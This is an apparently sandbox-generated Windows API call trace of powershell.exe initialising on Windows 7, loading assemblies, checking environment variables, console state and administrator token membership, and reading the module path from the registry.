	[0742.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0742.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0743.851] CoTaskMemAlloc (cb=0x104) returned 0x181590
	[0743.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.851] CoTaskMemFree (pv=0x181590) 
	[0743.852] CoTaskMemAlloc (cb=0x104) returned 0x181590
	[0743.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.853] CoTaskMemFree (pv=0x181590) 
	[0745.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0745.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0752.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0752.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0761.322] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0761.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.322] CoTaskMemFree (pv=0x1817b0) 
	[0761.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0761.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0761.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0761.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0763.597] SetErrorMode (uMode=0x1) returned 0x1
	[0763.597] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24db40 | out: lpFileInformation=0x24db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0765.308] SetErrorMode (uMode=0x1) returned 0x1
	[0785.822] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0785.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.822] CoTaskMemFree (pv=0x1817b0) 
	[0785.823] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0785.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.824] CoTaskMemFree (pv=0x1817b0) 
	[0785.824] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0785.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.824] CoTaskMemFree (pv=0x1817b0) 
	[0785.826] CoCreateGuid (in: pguid=0x24df08 | out: pguid=0x24df08*(Data1=0x9f046e87, Data2=0x6ba9, Data3=0x4361, Data4=([0]=0x9b, [1]=0x53, [2]=0x4a, [3]=0x91, [4]=0x79, [5]=0x4c, [6]=0x8e, [7]=0xc4))) returned 0x0
	[0785.830] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0785.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.830] CoTaskMemFree (pv=0x1817b0) 
	[0785.833] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0785.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.833] CoTaskMemFree (pv=0x1817b0) 
	[0785.836] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0785.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.836] CoTaskMemFree (pv=0x1817b0) 
	[0785.859] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0786.742] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24dbb0 | out: lpConsoleScreenBufferInfo=0x24dbb0) returned 1
	[0786.801] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0787.796] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24dbb0 | out: lpConsoleScreenBufferInfo=0x24dbb0) returned 1
	[0787.797] GetVersionExW (in: lpVersionInformation=0x24db40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0787.800] GetCurrentProcess () returned 0xffffffffffffffff
	[0787.801] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24dbd8 | out: TokenHandle=0x24dbd8*=0x304) returned 1
	[0787.805] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24daf8 | out: TokenInformation=0x0, ReturnLength=0x24daf8) returned 0
	[0787.806] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x13ac10
	[0787.806] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x13ac10, TokenInformationLength=0x4, ReturnLength=0x24daf8 | out: TokenInformation=0x13ac10, ReturnLength=0x24daf8) returned 1
	[0787.808] DuplicateTokenEx (in: hExistingToken=0x304, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24dc58 | out: phNewToken=0x24dc58*=0x300) returned 1
	[0787.808] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24daf8 | out: TokenInformation=0x0, ReturnLength=0x24daf8) returned 0
	[0787.808] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x13ac40
	[0787.808] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x13ac40, TokenInformationLength=0x4, ReturnLength=0x24daf8 | out: TokenInformation=0x13ac40, ReturnLength=0x24daf8) returned 1
	[0787.810] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2ce8088*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24dc68 | out: IsMember=0x24dc68) returned 1
	[0787.810] CloseHandle (hObject=0x300) returned 1
	[0787.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0787.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0787.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0787.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.876] CoTaskMemAlloc (cb=0x804) returned 0x1b7f2d60
	[0788.876] GetConsoleTitleW (in: lpConsoleTitle=0x1b7f2d60, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0788.877] CoTaskMemFree (pv=0x1b7f2d60) 
	[0788.890] CoTaskMemAlloc (cb=0x804) returned 0x1b7f3610
	[0788.891] GetConsoleTitleW (in: lpConsoleTitle=0x1b7f3610, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0788.891] CoTaskMemFree (pv=0x1b7f3610) 
	[0788.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.893] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0789.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.072] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0791.074] CoCreateGuid (in: pguid=0x24dd50 | out: pguid=0x24dd50*(Data1=0x3ff1a798, Data2=0xbf8c, Data3=0x483c, Data4=([0]=0xbb, [1]=0x8f, [2]=0xf9, [3]=0xfd, [4]=0x60, [5]=0xe, [6]=0x5f, [7]=0x2d))) returned 0x0
	[0791.075] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0791.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.075] CoTaskMemFree (pv=0x1817b0) 
	[0791.084] WinSqmIsOptedIn () returned 0x0
	[0791.086] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0791.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.086] CoTaskMemFree (pv=0x1817b0) 
	[0791.088] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0791.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.089] CoTaskMemFree (pv=0x1817b0) 
	[0791.090] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0791.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.090] CoTaskMemFree (pv=0x1817b0) 
	[0791.093] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0791.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.093] CoTaskMemFree (pv=0x1817b0) 
	[0791.093] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0791.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.093] CoTaskMemFree (pv=0x1817b0) 
	[0791.094] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0791.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.094] CoTaskMemFree (pv=0x1817b0) 
	[0792.157] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0792.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.157] CoTaskMemFree (pv=0x1817b0) 
	[0792.157] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0792.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.157] CoTaskMemFree (pv=0x1817b0) 
	[0792.161] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0792.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.161] CoTaskMemFree (pv=0x1817b0) 
	[0792.166] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0792.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.166] CoTaskMemFree (pv=0x1817b0) 
	[0792.166] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0792.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.166] CoTaskMemFree (pv=0x1817b0) 
	[0792.166] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0792.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.167] CoTaskMemFree (pv=0x1817b0) 
	[0796.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0796.333] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0796.333] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0796.334] CoTaskMemFree (pv=0x1817b0) 
	[0796.335] CoTaskMemAlloc (cb=0xcc) returned 0x18a630
	[0796.335] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x18a630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0796.335] CoTaskMemFree (pv=0x18a630) 
	[0796.335] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d8c8 | out: phkResult=0x24d8c8*=0x2dc) returned 0x0
	[0796.336] RegQueryValueExW (in: hKey=0x2dc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d84c, lpData=0x0, lpcbData=0x24d848*=0x0 | out: lpType=0x24d84c*=0x2, lpData=0x0, lpcbData=0x24d848*=0x6c) returned 0x0
	[0796.336] CoTaskMemAlloc (cb=0x70) returned 0x127cb0
